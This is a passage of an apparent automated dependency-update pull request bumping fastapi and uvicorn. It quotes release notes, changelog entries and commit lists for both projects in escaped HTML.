href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add FastAPI Conf '26 announcement to docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15457\"\u003e#15457\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eTranslations\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🌐 Improve translation consistency in \u003ccode\u003e‎docs/pt/docs/advanced/generate-clients.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15456\"\u003e#15456\u003c/a\u003e by \u003ca href=\"https://github.com/Will-thom\"\u003e\u003ccode\u003e@​Will-thom\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ja (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15530\"\u003e#15530\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for uk (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15529\"\u003e#15529\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for pt (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15528\"\u003e#15528\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for de (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15527\"\u003e#15527\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for tr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15526\"\u003e#15526\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ko (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15525\"\u003e#15525\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh-hant (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15524\"\u003e#15524\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for fr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15522\"\u003e#15522\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for es (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15523\"\u003e#15523\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15520\"\u003e#15520\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ru (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15521\"\u003e#15521\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Fix typos in Spanish LLM-prompt. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15472\"\u003e#15472\u003c/a\u003e by \u003ca href=\"https://github.com/crr004\"\u003e\u003ccode\u003e@​crr004\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e✅ Update tests, don't double dispose the engine. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15587\"\u003e#15587\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⚡️ Speed up test suite via caching and fixture scopes to make it ~24% faster. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/13583\"\u003e#13583\u003c/a\u003e by \u003ca href=\"https://github.com/dikos1337\"\u003e\u003ccode\u003e@​dikos1337\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔥 Remove config files now in central GitHub repo. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15585\"\u003e#15585\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump urllib3 from 2.6.3 to 2.7.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15502\"\u003e#15502\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump idna from 3.11 to 3.15. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15565\"\u003e#15565\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump cloudflare/wrangler-action from 3.15.0 to 4.0.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15571\"\u003e#15571\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔧 Migrate docs from MkDocs to Zensical. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15563\"\u003e#15563\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔒️ Only allow team members to modify dependencies. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15548\"\u003e#15548\u003c/a\u003e by \u003ca href=\"https://github.com/svlandeg\"\u003e\u003ccode\u003e@​svlandeg\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/82064857539e6286522c347b4b11331b48dd2378\"\u003e\u003ccode\u003e8206485\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c910e0139f983d0e04e2d1d235cd71803afeae34\"\u003e\u003ccode\u003ec910e01\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/063b5bf582d31fb155cc6bc6f88cf512329d0fd5\"\u003e\u003ccode\u003e063b5bf\u003c/code\u003e\u003c/a\u003e ♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (th...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/22b02e26f9e8c7e32bd8266e2b0ebe8bb3a0db2b\"\u003e\u003ccode\u003e22b02e2\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3b252a2a22ba27a8ab83d6bde7d9cddbc5bf738e\"\u003e\u003ccode\u003e3b252a2\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c7fb7851b3389f24c51701d705458989be53ccbb\"\u003e\u003ccode\u003ec7fb785\u003c/code\u003e\u003c/a\u003e ♻️ Validate Server Sent Event fields to avoid applications from sending broke...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/cb83b83dcf78eab4ea17d504db5abcda705fbdc4\"\u003e\u003ccode\u003ecb83b83\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/00f805cec94c0bf48c1f9a563535a3ab2e6f90ab\"\u003e\u003ccode\u003e00f805c\u003c/code\u003e\u003c/a\u003e ✅ Update tests, don't double dispose the engine (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15587\"\u003e#15587\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3675137523dc167981aa3a3c44599b4f3079ccd8\"\u003e\u003ccode\u003e3675137\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/7b57e42986bb4d40c9eb6580537d13fb8e76097e\"\u003e\u003ccode\u003e7b57e42\u003c/code\u003e\u003c/a\u003e 📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15464\"\u003e#15464\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fastapi/fastapi/compare/0.115.14...0.136.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `uvicorn` from 0.32.1 to 0.49.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Kludex/uvicorn/releases\"\u003euvicorn's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 0.49.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBump httptools minimum version to 0.8.0 by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2962\"\u003eKludex/uvicorn#2962\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eConsume duplicate forwarding headers in ProxyHeadersMiddleware (reverses the 0.48.0 behavior of ignoring them) by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2971\"\u003eKludex/uvicorn#2971\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.48.0...0.49.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.48.0...0.49.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.48.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDefault \u003ccode\u003essl_ciphers\u003c/code\u003e to \u003ccode\u003eNone\u003c/code\u003e and use OpenSSL defaults by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2940\"\u003eKludex/uvicorn#2940\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIgnore duplicate forwarding headers in \u003ccode\u003eProxyHeadersMiddleware\u003c/code\u003e by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2944\"\u003eKludex/uvicorn#2944\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.47.0...0.48.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.47.0...0.48.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.47.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEagerly import the ASGI app in the parent process by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2919\"\u003eKludex/uvicorn#2919\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003essl_context_factory\u003c/code\u003e for custom \u003ccode\u003eSSLContext\u003c/code\u003e configuration by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2920\"\u003eKludex/uvicorn#2920\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTreat \u003ccode\u003efd=0\u003c/code\u003e as a valid file descriptor with reload/workers by \u003ca href=\"https://github.com/eltoder\"\u003e\u003ccode\u003e@​eltoder\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2927\"\u003eKludex/uvicorn#2927\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.46.0...0.47.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.46.0...0.47.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.46.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_max_size\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2915\"\u003eKludex/uvicorn#2915\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_ping_interval\u003c/code\u003e and \u003ccode\u003ews_ping_timeout\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2916\"\u003eKludex/uvicorn#2916\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003ebytearray\u003c/code\u003e for incoming WebSocket message buffer in websockets-sansio by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2917\"\u003eKludex/uvicorn#2917\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.45.0...0.46.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.45.0...0.46.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.45.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePreserve forwarded client ports in proxy headers middleware by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2903\"\u003eKludex/uvicorn#2903\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAccept \u003ccode\u003eos.PathLike\u003c/code\u003e for \u003ccode\u003elog_config\u003c/code\u003e by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2905\"\u003eKludex/uvicorn#2905\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAccept \u003ccode\u003elog_level\u003c/code\u003e strings case-insensitively by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2907\"\u003eKludex/uvicorn#2907\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRaise helpful \u003ccode\u003eImportError\u003c/code\u003e when PyYAML is missing for YAML log config by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2906\"\u003eKludex/uvicorn#2906\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert empty context for ASGI runs by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2911\"\u003eKludex/uvicorn#2911\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003e--reset-contextvars\u003c/code\u003e flag to isolate ASGI request context by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2912\"\u003eKludex/uvicorn#2912\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert \u0026quot;Emit \u003ccode\u003ehttp.disconnect\u003c/code\u003e on server shutdown for streaming responses\u0026quot; (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2829\"\u003e#2829\u003c/a\u003e) by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2913\"\u003eKludex/uvicorn#2913\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Krishnachaitanyakc\"\u003e\u003ccode\u003e@​Krishnachaitanyakc\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2870\"\u003eKludex/uvicorn#2870\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.44.0...0.45.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.44.0...0.45.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.44.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement websocket keepalive pings for websockets-sansio by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2888\"\u003eKludex/uvicorn#2888\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Kludex/uvicorn/blob/main/docs/release-notes.md\"\u003euvicorn's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.49.0 (June 3, 2026)\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump \u003ccode\u003ehttptools\u003c/code\u003e minimum version to 0.8.0 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2962\"\u003e#2962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eConsume duplicate forwarding headers in \u003ccode\u003eProxyHeadersMiddleware\u003c/code\u003e (reverses the 0.48.0 behavior of ignoring them) (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2971\"\u003e#2971\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.48.0 (May 24, 2026)\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDefault \u003ccode\u003essl_ciphers\u003c/code\u003e to \u003ccode\u003eNone\u003c/code\u003e and use OpenSSL defaults (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2940\"\u003e#2940\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eIgnore duplicate forwarding headers in \u003ccode\u003eProxyHeadersMiddleware\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2944\"\u003e#2944\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.47.0 (May 14, 2026)\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003essl_context_factory\u003c/code\u003e for custom \u003ccode\u003eSSLContext\u003c/code\u003e configuration (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2920\"\u003e#2920\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eEagerly import the ASGI app in the parent process (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2919\"\u003e#2919\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTreat \u003ccode\u003efd=0\u003c/code\u003e as a valid file descriptor with reload/workers (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2927\"\u003e#2927\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.46.0 (April 23, 2026)\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_max_size\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2915\"\u003e#2915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_ping_interval\u003c/code\u003e and \u003ccode\u003ews_ping_timeout\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2916\"\u003e#2916\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUse \u003ccode\u003ebytearray\u003c/code\u003e for incoming WebSocket message buffer in \u003ccode\u003ewebsockets-sansio\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2917\"\u003e#2917\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.45.0 (April 21, 2026)\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003e--reset-contextvars\u003c/code\u003e flag to isolate ASGI request context (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2912\"\u003e#2912\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAccept \u003ccode\u003eos.PathLike\u003c/code\u003e for \u003ccode\u003elog_config\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2905\"\u003e#2905\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAccept \u003ccode\u003elog_level\u003c/code\u003e strings case-insensitively (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2907\"\u003e#2907\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/3ef2e3e08e3d9ad9572800f8bc54f3eaed9eab0a\"\u003e\u003ccode\u003e3ef2e3e\u003c/code\u003e\u003c/a\u003e Version 0.49.0 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2973\"\u003e#2973\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/eeb64b1d1c95a14096ed3313377c74b485f558fc\"\u003e\u003ccode\u003eeeb64b1\u003c/code\u003e\u003c/a\u003e Consume duplicate forwarding headers in ProxyHeadersMiddleware (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2971\"\u003e#2971\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/630f4aca14e79183617c71be714030842a1041c5\"\u003e\u003ccode\u003e630f4ac\u003c/code\u003e\u003c/a\u003e Make the watchfiles reload tests deterministic (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2972\"\u003e#2972\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/9154922e3730f7aba68ecc3ecbf536680ee8fd1c\"\u003e\u003ccode\u003e9154922\u003c/code\u003e\u003c/a\u003e chore(deps): bump the github-actions group across 1 directory with 6 updates ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/739727a1d80e468d1e47e98bbd824ee9e3c9554b\"\u003e\u003ccode\u003e739727a\u003c/code\u003e\u003c/a\u003e Migrate docs deploy from Cloudflare Pages to Workers (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2967\"\u003e#2967\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/be4a240488d3fb678a11b8e8f83505266f5f1de7\"\u003e\u003ccode\u003ebe4a240\u003c/code\u003e\u003c/a\u003e Gate docs preview deploy on Cloudflare token presence (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2966\"\u003e#2966\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/c489d7e10dfe653a2bba914feedf2a632a026e6f\"\u003e\u003ccode\u003ec489d7e\u003c/code\u003e\u003c/a\u003e Bump httptools minimum version to 0.8.0 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2962\"\u003e#2962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/9f547bd82ef52bcba206e04170b359bd6daa25b3\"\u003e\u003ccode\u003e9f547bd\u003c/code\u003e\u003c/a\u003e Skip docs preview deploy for Dependabot PRs (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2961\"\u003e#2961\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/44446b894e37ca76830d6aa83df4349795400ed4\"\u003e\u003ccode\u003e44446b8\u003c/code\u003e\u003c/a\u003e Migrate documentation from MkDocs Material to Zensical (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2959\"\u003e#2959\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca 